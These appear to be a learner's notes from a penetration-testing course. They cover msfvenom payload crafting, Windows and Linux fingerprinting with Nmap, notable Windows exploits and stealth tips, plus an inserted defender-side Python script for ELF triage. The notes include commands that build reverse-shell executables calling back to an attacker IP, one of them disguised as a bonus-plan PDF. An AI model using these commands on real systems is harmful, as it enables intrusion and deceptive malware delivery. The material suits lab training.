1. Crafting Payloads with MSFvenom
1) List Payloads
yeon0815@htb[/htb]$ msfvenom -l payloads
Framework Payloads (592 total) [--payload <value>]
==================================================
Name Description
---- -----------
linux/x86/shell/reverse_nonx_tcp Spawn a command shell (staged). Connect back to the attacker
linux/x86/shell/reverse_tcp Spawn a command shell (staged). Connect back to the attacker
linux/x86/shell/reverse_tcp_uuid Spawn a command shell (staged). Connect back to the attacker
linux/x86/shell_bind_ipv6_tcp Listen for a connection over IPv6 and spawn a command shell
linux/x86/shell_bind_tcp Listen for a connection and spawn a command shell
linux/x86/shell_bind_tcp_random_port Listen for a connection in a random port and spawn a command shell. Use nmap to discover the open port: 'nmap -sS target -p-'.
linux/x86/shell_find_port Spawn a shell on an established connection
linux/x86/shell_find_tag Spawn a shell on an established connection (proxy/nat safe)
linux/x86/shell_reverse_tcp Connect back to attacker and spawn a command shell
linux/x86/shell_reverse_tcp_ipv6 Connect back to attacker and spawn a command shell over IPv6
linux/zarch/meterpreter_reverse_http Run the Meterpreter / Mettle server payload (stageless)
linux/zarch/meterpreter_reverse_https Run the Meterpreter / Mettle server payload (stageless)
linux/zarch/meterpreter_reverse_tcp Run the Meterpreter / Mettle server payload (stageless)
mainframe/shell_reverse_tcp Listen for a connection and spawn a command shell. This implementation does not include ebcdic character translation, so a client with translation capabilities is required. MSF handles this automatically.
multi/meterpreter/reverse_http Handle Meterpreter sessions regardless of the target arch/platform. Tunnel communication over HTTP
multi/meterpreter/reverse_https Handle Meterpreter sessions regardless of the target arch/platform. Tunnel communication over HTTPS
netware/shell/reverse_tcp Connect to the NetWare console (staged). Connect back to the attacker
nodejs/shell_bind_tcp Creates an interactive shell via nodejs
nodejs/shell_reverse_tcp Creates an interactive shell via nodejs
nodejs/shell_reverse_tcp_ssl Creates an interactive shell via nodejs, uses SSL
osx/armle/execute/bind_tcp Spawn a command shell (staged). Listen for a connection
osx/armle/execute/reverse_tcp Spawn a command shell (staged). Connect back to the attacker
osx/armle/shell/bind_tcp Spawn a command shell (staged). Listen for a connection
osx/armle/shell/reverse_tcp Spawn a command shell (staged). Connect back to the attacker
osx/armle/shell_bind_tcp Listen for a connection and spawn a command shell
osx/armle/shell_reverse_tcp Connect back to attacker and spawn a command shell
osx/armle/vibrate Causes the iPhone to vibrate, only works when the AudioToolkit library has been loaded. Based on work by Charlie Miller
windows/dllinject/bind_hidden_tcp Inject a DLL via a reflective loader. Listen for a connection from a hidden port and spawn a command shell to the allowed host.
windows/dllinject/bind_ipv6_tcp Inject a DLL via a reflective loader. Listen for an IPv6 connection (Windows x86)
windows/dllinject/bind_ipv6_tcp_uuid Inject a DLL via a reflective loader. Listen for an IPv6 connection with UUID Support (Windows x86)
windows/dllinject/bind_named_pipe Inject a DLL via a reflective loader. Listen for a pipe connection (Windows x86)
windows/dllinject/bind_nonx_tcp Inject a DLL via a reflective loader. Listen for a connection (No NX)
windows/dllinject/bind_tcp Inject a DLL via a reflective loader. Listen for a connection (Windows x86)
windows/dllinject/bind_tcp_rc4 Inject a DLL via a reflective loader. Listen for a connection
windows/dllinject/bind_tcp_uuid Inject a DLL via a reflective loader. Listen for a connection with UUID Support (Windows x86)
windows/dllinject/find_tag Inject a DLL via a reflective loader. Use an established connection
windows/dllinject/reverse_hop_http Inject a DLL via a reflective loader. Tunnel communication over an HTTP or HTTPS hop point. Note that you must first upload data/hop/hop.php to the PHP server you wish to use as a hop.
windows/dllinject/reverse_http Inject a DLL via a reflective loader. Tunnel communication over HTTP (Windows wininet)
windows/dllinject/reverse_http_proxy_pstore Inject a DLL via a reflective loader. Tunnel communication over HTTP
windows/dllinject/reverse_ipv6_tcp Inject a DLL via a reflective loader. Connect back to the attacker over IPv6
windows/dllinject/reverse_nonx_tcp Inject a DLL via a reflective loader. Connect back to the attacker (No NX)
windows/dllinject/reverse_ord_tcp Inject a DLL via a reflective loader. Connect back to the attacker
windows/dllinject/reverse_tcp Inject a DLL via a reflective loader. Connect back to the attacker
windows/dllinject/reverse_tcp_allports Inject a DLL via a reflective loader. Try to connect back to the attacker, on all possible ports (1-65535, slowly)
windows/dllinject/reverse_tcp_dns Inject a DLL via a reflective loader. Connect back to the attacker
windows/dllinject/reverse_tcp_rc4 Inject a DLL via a reflective loader. Connect back to the attacker
windows/dllinject/reverse_tcp_rc4_dns Inject a DLL via a reflective loader. Connect back to the attacker
windows/dllinject/reverse_tcp_uuid Inject a DLL via a reflective loader. Connect back to the attacker with UUID Support
windows/dllinject/reverse_winhttp Inject a DLL via a reflective loader. Tunnel communication over HTTP (Windows winhttp)
* Staged vs Stageless Payloads
- Staged payloads are delivered in pieces: a small first stage connects back and then pulls over the rest, which gives us a way to send more components of our attack across.
- Stageless payloads do not have a stage. The payload is sent in its entirety across the network connection, with no follow-up download. This can benefit us in environments where we do not have much bandwidth or where latency can interfere with a second stage.
e.g., Staged payloads: linux/x86/shell/reverse_tcp
e.g., Stageless payloads: linux/zarch/meterpreter_reverse_tcp
2) Building A Stageless Payload
(1) Build it
yeon0815@htb[/htb]$ msfvenom -p linux/x64/shell_reverse_tcp LHOST=10.10.14.113 LPORT=443 -f elf > createbackup.elf
[-] No platform was selected, choosing Msf::Module::Platform::Linux from the payload
[-] No arch selected, selecting arch: x64 from the payload
No encoder specified, outputting raw payload
Payload size: 74 bytes
Final size of elf file: 194 bytes
(2) Call MSFvenom
msfvenom
(3) Creating a Payload
-p
(4) Choosing the payload based on Architecture
linux/x64/shell_reverse_tcp
- Linux 64-bit stageless payload that initiates a TCP-based reverse shell (shell_reverse_tcp)
(5) Address to connect back to
LHOST=10.10.14.113 LPORT=443
(6) Format to generate payload in
-f elf
- The -f flag specifies the format the generated binary will be in. In this case, it will be an .elf file.
(7) Output
> createbackup.elf
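A defender-side check derived from the numbers in that run, added here as an example and not code from the page or from Metasploit: the 194-byte file is a 64-byte ELF64 header, one 56-byte program header and the 74 payload bytes. The script below parses those two headers and flags the traits such stubs share (no section headers, a single RWX PT_LOAD segment, tiny size); the function names and the all-NOP 194-byte sample are the example's own constructions.

```python
# Added defender-side triage example (not from the page or Metasploit). A
# msfvenom-style ELF stub is a 64-byte ELF64 header + a 56-byte program header
# + the payload (64 + 56 + 74 = 194 bytes in the run above): no section headers,
# one RWX PT_LOAD segment, tiny size. Compiler-built binaries rarely look so.
import struct

ELF_MAGIC = b"\x7fELF"
PT_LOAD = 1
PF_X, PF_W, PF_R = 1, 2, 4
EHDR_FMT = "<HHIQQQIHHHHHH"   # ELF64 header fields after the 16-byte e_ident
PHDR_FMT = "<IIQQQQQQ"        # one ELF64 program header (56 bytes)

def parse_elf64(data: bytes) -> dict:
    """Parse the ELF64 header and program headers; raise ValueError if malformed."""
    if len(data) < 64 or data[:4] != ELF_MAGIC:
        raise ValueError("not an ELF file")
    if data[4] != 2:
        raise ValueError("only ELF64 handled here")
    (_type, _mach, _ver, e_entry, e_phoff, _shoff, _flags, _ehsize, e_phentsize,
     e_phnum, _shentsize, e_shnum, _shstrndx) = struct.unpack_from(EHDR_FMT, data, 16)
    segments = []
    for i in range(e_phnum):
        off = e_phoff + i * e_phentsize
        if off + 56 > len(data):
            raise ValueError("program header table runs past end of file")
        p_type, p_flags, p_offset, _va, _pa, p_filesz, _memsz, _align = \
            struct.unpack_from(PHDR_FMT, data, off)
        segments.append({"type": p_type, "flags": p_flags,
                         "offset": p_offset, "filesz": p_filesz})
    return {"entry": e_entry, "shnum": e_shnum, "segments": segments, "size": len(data)}

def triage(data: bytes) -> list:
    """Return the reasons (possibly none) why this ELF looks like a raw shellcode stub."""
    info = parse_elf64(data)
    reasons = []
    if info["shnum"] == 0:                       # no .text/.data/.symtab at all
        reasons.append("no section headers")
    loads = [s for s in info["segments"] if s["type"] == PT_LOAD]
    rwx = PF_R | PF_W | PF_X
    if len(loads) == 1 and (loads[0]["flags"] & rwx) == rwx:
        reasons.append("single RWX PT_LOAD segment")
    if info["size"] < 1024:
        reasons.append("tiny file (%d bytes)" % info["size"])
    return reasons

def build_sample(payload_len: int = 74) -> bytes:
    """Constructed 194-byte sample whose all-NOP body stands in for a real payload."""
    base, hdr_len = 0x400000, 64 + 56
    e_ident = ELF_MAGIC + bytes([2, 1, 1, 0]) + b"\x00" * 8    # ELF64, little-endian
    ehdr = e_ident + struct.pack(EHDR_FMT, 2, 0x3E, 1, base + hdr_len, 64, 0, 0,
                                 64, 56, 1, 64, 0, 0)          # phnum=1, shnum=0
    phdr = struct.pack(PHDR_FMT, PT_LOAD, PF_R | PF_W | PF_X, 0, base, base,
                       hdr_len + payload_len, hdr_len + payload_len, 0x1000)
    return ehdr + phdr + b"\x90" * payload_len
```

Running triage() over a directory of ELF files surfaces candidates for closer inspection; a legitimate static binary will normally carry section headers and split code and data into separate segments.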
3) Building a simple Stageless Payload for a Windows system
- We can also use msfvenom to craft an executable (.exe) file that can be run on a Windows system to provide a shell.
(1) Windows Payload
yeon0815@htb[/htb]$ msfvenom -p windows/shell_reverse_tcp LHOST=10.10.14.113 LPORT=443 -f exe > BonusCompensationPlanpdf.exe
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
No encoder specified, outputting raw payload
Payload size: 324 bytes
Final size of exe file: 73802 bytes
2. Infiltrating Windows
1) Prominent Windows Exploits
(1) MS08-067
- It is a critical patch pushed out to many different Windows revisions due to an SMB flaw.
(2) EternalBlue
- This attack took advantage of a flaw in the SMB v1 protocol that allowed code execution.
(3) PrintNightmare
- A remote code execution vulnerability in the Windows Print Spooler.
- With valid credentials for that host or a low-privilege shell, you can install a printer and add a driver that runs on your behalf, granting system-level access to the host.
(4) BlueKeep
- It is a vulnerability in Microsoft's RDP protocol that allows for Remote Code Execution.
(5) SIGRed
- It exploits a flaw in how Windows DNS reads SIG resource records.
(6) SeriousSam
- It exploits an issue with the way Windows handles permissions on C:\Windows\system32\config. Before the issue was fixed, non-elevated users had access to the SAM database, among other files.
(7) Zerologon
- It is a critical vulnerability that exploits a cryptographic flaw in Microsoft's Active Directory Netlogon Remote Protocol (MS-NRPC).
- It lets users log on to servers using NT LAN Manager (NTLM) and even send account changes via the protocol.
- The attack can be a bit complex to understand, but it is trivial to execute, since an attacker would only have to make around 256 guesses at a computer account password before finding what they need.
2) Enumerating Windows & Fingerprinting Methods
(1) Pinged Host
yeon0815@htb[/htb]$ ping 192.168.86.39
PING 192.168.86.39 (192.168.86.39): 56 data bytes
64 bytes from 192.168.86.39: icmp_seq=0 ttl=128 time=102.920 ms
64 bytes from 192.168.86.39: icmp_seq=1 ttl=128 time=9.164 ms
64 bytes from 192.168.86.39: icmp_seq=2 ttl=128 time=14.223 ms
64 bytes from 192.168.86.39: icmp_seq=3 ttl=128 time=11.265 ms
- TTL (Time To Live): a typical response from a Windows host will carry a TTL of either 32 or 128.
(2) NMAP OS Detection Scan
yeon0815@htb[/htb]$ sudo nmap -v -O 192.168.86.39
Starting Nmap 7.92 ( https://nmap.org ) at 2021-09-20 17:40 EDT
Initiating ARP Ping Scan at 17:40
Scanning 192.168.86.39 [1 port]
Completed ARP Ping Scan at 17:40, 0.12s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 17:40
Completed Parallel DNS resolution of 1 host. at 17:40, 0.02s elapsed
Initiating SYN Stealth Scan at 17:40
Scanning desktop-jba7h4t.lan (192.168.86.39) [1000 ports]
Discovered open port 139/tcp on 192.168.86.39
Discovered open port 135/tcp on 192.168.86.39
Discovered open port 443/tcp on 192.168.86.39
Discovered open port 445/tcp on 192.168.86.39
Discovered open port 902/tcp on 192.168.86.39
Discovered open port 912/tcp on 192.168.86.39
Completed SYN Stealth Scan at 17:40, 1.54s elapsed (1000 total ports)
Initiating OS detection (try #1) against desktop-jba7h4t.lan (192.168.86.39)
Nmap scan report for desktop-jba7h4t.lan (192.168.86.39)
Host is up (0.010s latency).
Not shown: 994 closed tcp ports (reset)
PORT STATE SERVICE
135/tcp open msrpc
139/tcp open netbios-ssn
443/tcp open https
445/tcp open microsoft-ds
902/tcp open iss-realsecure
912/tcp open apex-mesh
MAC Address: DC:41:A9:FB:BA:26 (Intel Corporate)
Device type: general purpose
Running: Microsoft Windows 10
OS CPE: cpe:/o:microsoft:windows_10
OS details: Microsoft Windows 10 1709 - 1909
Network Distance: 1 hop
- If you run into issues and the scans turn up few results, try again with the -A and -Pn options.
(3) Banner Grab to Enumerate Ports
yeon0815@htb[/htb]$ sudo nmap -v 192.168.86.39 --script banner.nse
Starting Nmap 7.92 ( https://nmap.org ) at 2021-09-20 18:01 EDT
NSE: Loaded 1 scripts for scanning.
<snip>
Discovered open port 135/tcp on 192.168.86.39
Discovered open port 139/tcp on 192.168.86.39
Discovered open port 445/tcp on 192.168.86.39
Discovered open port 443/tcp on 192.168.86.39
Discovered open port 912/tcp on 192.168.86.39
Discovered open port 902/tcp on 192.168.86.39
Completed SYN Stealth Scan at 18:01, 1.46s elapsed (1000 total ports)
NSE: Script scanning 192.168.86.39.
Initiating NSE at 18:01
Completed NSE at 18:01, 20.11s elapsed
Nmap scan report for desktop-jba7h4t.lan (192.168.86.39)
Host is up (0.012s latency).
Not shown: 994 closed tcp ports (reset)
PORT STATE SERVICE
135/tcp open msrpc
139/tcp open netbios-ssn
443/tcp open https
445/tcp open microsoft-ds
902/tcp open iss-realsecure
| banner: 220 VMware Authentication Daemon Version 1.10: SSL Required, Se
|_rverDaemonProtocol:SOAP, MKSDisplayProtocol:VNC , , NFCSSL supported/t
912/tcp open apex-mesh
| banner: 220 VMware Authentication Daemon Version 1.0, ServerDaemonProto
|_col:SOAP, MKSDisplayProtocol:VNC , ,
MAC Address: DC:41:A9:FB:BA:26 (Intel Corporate)
3) Payload Types to Consider
(1) DLLs
- A Dynamic Link Library (DLL) is a library file used in Microsoft operating systems to provide shared code and data that many different programs can use at once.
(2) Batch
- Batch files are text-based DOS scripts used by system administrators to complete multiple tasks through the command-line interpreter.
- They end with the .bat extension.
(3) VBS
- VBScript is a lightweight scripting language based on Microsoft's Visual Basic.
- It is typically used as a client-side scripting language by web servers to enable dynamic web pages.
- VBS lives on in the context of phishing and other attacks that aim to have users perform an action, such as enabling macros in an Excel document or clicking on a cell, so that the Windows scripting engine executes a piece of code.
(4) MSI
- .msi files serve as an installation database for the Windows Installer.
- When installing a new application, the installer reads the .msi file to learn which components are required and where to find them.
- We can use the Windows Installer by crafting a payload as an .msi file. Once it is on the host, we can run msiexec to execute it, which can provide further access, such as an elevated reverse shell.
(5) PowerShell
- It is both a shell environment and a scripting language.
4) Payload Generation
(1) MSFvenom & Metasploit Framework
(2) Payloads All The Things:
- A list of useful payloads and bypasses for Web Application Security and Pentest/CTF.
https://github.com/swisskyrepo/PayloadsAllTheThings
(3) Mythic C2 Framework:
- It is an alternative option to Metasploit as a Command and Control Framework and toolbox for unique payload generation.
https://github.com/its-a-feature/Mythic
(4) Nishang:
- It is a framework collection of Offensive PowerShell Implants and scripts.
https://github.com/samratashok/nishang
(5) Darkarmour:
- It is a tool to generate and utilize obfuscated binaries for use against Windows hosts.
https://github.com/bats3c/darkarmour
5) Payload Transfer and Execution
(1) Impacket
- It is a toolset built in Python that gives us a way to interact with network protocols directly.
(2) Payloads All The Things
a. SMB
b. Remote execution via MSF
c. Other protocols (e.g., FTP, TFTP, HTTP/S)
6) CMD-prompt vs PowerShell
- We have two choices of shell to use by default.
(1) CMD
- CMD is the original MS-DOS shell built into Windows.
- It was made for basic interaction and IT operations on a host.
(2) PowerShell
- It was introduced to expand the capabilities of CMD. It understands the native MS-DOS commands used in CMD as well as a whole new set of commands based on .NET.
- CMD deals with text input and output, while PowerShell uses .NET objects for all input and output.
- CMD does not keep a record of the commands used during the session, whereas PowerShell does. So in the context of being stealthy, executing commands with CMD leaves less of a trace on the host.
(3) Use CMD when:
a. You are on an older host that may not include PowerShell.
b. You only require simple interactions with, or access to, the host.
c. You plan to use simple batch files, not commands, or MS-DOS native tools.
d. You believe that execution policies may affect your ability to run scripts or other actions on the host.
(4) Use PowerShell when:
a. You plan to use cmdlets or other custom-built scripts.
b. You wish to interact with .NET objects instead of text output.
c. Being stealthy is of lesser concern.
d. You plan to interact with cloud-based services and hosts.
e. Your scripts set and use aliases.
7) WSL and PowerShell for Linux
(1) WSL
- Windows Subsystem for Linux is a feature introduced to Windows hosts that provides a virtual Linux environment built into the host.
- Any network requests or functions executed to or from the WSL instance are not parsed by the Windows Firewall and Windows Defender, making it a bit of a blind spot on the host.
(2) PowerShell
- PowerShell Core can be installed on Linux operating systems and carries over many normal PowerShell functions.
3. Infiltrating Unix/Linux
1) Gaining a Shell Through Attacking a Vulnerable Application
(1) Enumerate the host: NMAP
(2) rConfig Management Tool
- This application is used by network and system administrators to automate the configuration of network appliances.
(3) Discovering a Vulnerability in rConfig: Google search
(4) Search for an Exploit Module: Metasploit
- There may be useful exploit modules that are not installed on our system or just aren't showing up via search. In these cases, it's good to know that Rapid7 keeps the code for exploit modules in their repos on GitHub. We could do an even more specific search using a search engine: 'rConfig 3.9.6 exploit metasploit github'
a. Copy the code from this repo onto our local attack box and save it in the directory that our local install of MSF is referencing.
yeon0815@htb[/htb]$ locate exploits
b. If we copy it into a file on our local system, make sure the file has the .rb extension. All modules in MSF are written in Ruby.
(5) Using the rConfig Exploit and Gaining a Shell